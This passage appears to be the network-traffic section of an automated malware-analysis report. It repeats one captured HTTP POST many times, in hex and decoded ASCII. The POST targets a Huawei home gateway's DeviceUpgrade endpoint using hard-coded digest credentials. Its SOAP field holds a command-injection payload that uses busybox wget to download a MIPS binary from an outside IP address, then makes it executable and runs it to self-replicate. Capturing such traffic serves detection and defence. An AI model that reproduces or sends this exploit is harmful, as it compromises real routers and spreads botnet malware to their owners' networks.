75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 